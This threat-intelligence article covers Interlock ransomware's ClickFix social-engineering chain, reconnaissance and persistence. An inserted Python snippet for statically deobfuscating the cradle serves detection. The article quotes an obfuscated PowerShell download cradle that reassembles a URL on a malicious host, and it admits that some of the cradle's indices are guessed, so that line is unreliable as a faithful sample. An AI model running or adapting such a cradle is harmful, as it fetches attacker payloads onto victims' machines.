Interlock Ransomware Employs ClickFix Technique to Run Malicious Commands on Windows Machines
The cybersecurity landscape continues to evolve as threat actors develop increasingly sophisticated methods to compromise Windows systems.
A new ransomware variant known as Interlock has emerged as a significant threat, leveraging the deceptive ClickFix social engineering technique to execute malicious commands on victim machines.
This malware represents a concerning evolution in ransomware deployment tactics, combining traditional phishing approaches with advanced multi-stage payload delivery mechanisms.
Interlock ransomware has been actively targeting organizations across North America and Europe since September 2024, demonstrating a clear financial motivation through its double extortion methodology.
The threat group behind this malware has shown remarkable persistence and technical sophistication, employing a complex attack chain that begins with compromised websites and culminates in full system compromise.
The malware’s ability to fingerprint victim systems and prioritize high-value targets indicates a well-resourced operation with strategic objectives.
In July 2025, eSentire analysts identified multiple sophisticated incidents attributed to the Interlock Group, revealing the ransomware’s evolving capabilities and attack methodologies.
The security researchers discovered that the threat actors had developed a multi-layered approach involving PowerShell scripts, PHP backdoors, and custom-built remote access tools.
This comprehensive analysis has provided crucial insights into the malware’s operational tactics, techniques, and procedures, offering the cybersecurity community valuable intelligence for defensive measures.
The attack begins when victims unknowingly visit compromised websites, particularly those infected through the KongTuke compromise chain, which subsequently redirect users to malicious ClickFix pages.
ClickFix represents a social engineering technique that deceives victims into executing harmful commands by presenting fake error messages or system notifications that appear legitimate.
Upon interaction with these deceptive elements, victims are prompted to copy and execute PowerShell commands that appear to resolve fictitious technical issues.
Advanced Multi-Stage Infection Mechanism
The technical sophistication of Interlock’s infection process demonstrates the threat actors’ deep understanding of Windows system architecture and user behavior patterns.
The initial ClickFix payload employs an obfuscated PowerShell command that establishes the foundation for subsequent malicious activities.
The deobfuscated command reveals a carefully crafted download cradle designed to retrieve additional payloads from command and control infrastructure.
The malicious PowerShell command follows this pattern (the $gt[0], $gt[2] and $gt[3] indices are assumed from the reassembly order, as only $gt[1] survived extraction): $gt="dng-m,i,crosoftds,com".Split(',');$yn='htt'+'ps://'+$gt[0]+$gt[1]+$gt[2]+'.'+$gt[3]+'/' + 'uvA'+'4I'+'BD'+'9'+'.txt'
This obfuscation technique splits domain components and reassembles them dynamically, effectively evading basic string-based detection mechanisms while maintaining functionality.
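A static deobfuscator for this split-and-concatenate pattern, added here as an illustration and not code from eSentire or the article; it assumes the $gt[0]..$gt[3] indices follow the reassembly order shown above and folds the assignments without executing anything, so the reassembled URL can be matched even though it never appears as a literal string:

```python
import re

# Constructed sample modelled on the cradle quoted above; the $gt[n] indices
# are an assumption (reassembly order), not taken from the article verbatim.
SAMPLE = ("$gt=\"dng-m,i,crosoftds,com\".Split(',');"
          "$yn='htt'+'ps://'+$gt[0]+$gt[1]+$gt[2]+'.'+$gt[3]+'/' "
          "+ 'uvA'+'4I'+'BD'+'9'+'.txt'")

# $name="a,b,c".Split(',')            -> name maps to ["a", "b", "c"]
SPLIT_RE = re.compile(r'''\$(\w+)\s*=\s*"([^"]*)"\.Split\(\s*'(.)'\s*\)''')
# $name='lit'+$arr[i]+...             -> chain of literals and array elements
CONCAT_RE = re.compile(r"\$(\w+)\s*=\s*((?:'[^']*'|\$\w+\[\d+\]|\s*\+\s*)+)")
TOKEN_RE = re.compile(r"'([^']*)'|\$(\w+)\[(\d+)\]")
URL_RE = re.compile(r"https?://[\w.-]+(?:/[\w./-]*)?")

def deobfuscate(cmd):
    """Statically fold Split()/concatenation assignments; nothing is executed."""
    arrays = {n: raw.split(sep) for n, raw, sep in SPLIT_RE.findall(cmd)}
    resolved = {}
    for name, expr in CONCAT_RE.findall(cmd):
        parts = []
        for lit, arr, idx in TOKEN_RE.findall(expr):
            if arr:  # $arr[i]: look the element up, keep a marker if unknown
                elems = arrays.get(arr, [])
                i = int(idx)
                parts.append(elems[i] if i < len(elems) else f"<{arr}[{i}]?>")
            else:    # quoted literal fragment
                parts.append(lit)
        resolved[name] = "".join(parts)
    return resolved

def recovered_urls(cmd):
    """URLs that exist only after reassembly, i.e. invisible to a raw grep."""
    found = set()
    for value in deobfuscate(cmd).values():
        found.update(URL_RE.findall(value))
    return sorted(u for u in found if u not in cmd)

def indicators(cmd):
    """Structural tells of this ClickFix-style cradle, for triage rules."""
    hits = []
    if SPLIT_RE.search(cmd):
        hits.append("string literal split into an array")
    if re.search(r"'htt'\s*\+\s*'ps?://'", cmd):
        hits.append("URL scheme assembled from fragments")
    if cmd.count("+") >= 8:
        hits.append(f"heavy concatenation ({cmd.count('+')} joins)")
    if recovered_urls(cmd):
        hits.append("URL hidden until reassembly")
    return hits
```

Run recovered_urls() over PowerShell command lines from Script Block Logging (Event ID 4104) or process-creation telemetry to feed the reassembled domain into blocklists and detection rules.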
Once executed, the PowerShell script performs system reconnaissance through the systeminfo command, collecting comprehensive hardware and software information that is transmitted to the threat actors’ command and control servers.
This fingerprinting process enables the malware to determine whether the target system represents a valuable victim or a security researcher’s honeypot.
Based on this analysis, the malware either proceeds with the infection chain or terminates to avoid detection.
The malware establishes persistence through a sophisticated mechanism involving Windows shortcuts placed in the victim’s startup folder.
The Simple Process Launcher component, identified as c2.exe, uses the Windows API function CreateProcessW to spawn additional PowerShell processes while displaying fake error messages to maintain the illusion of system problems.
This deceptive approach, combined with the use of legitimate Windows binaries like rundll32.exe, demonstrates the threat actors’ commitment to blending malicious activities with normal system operations.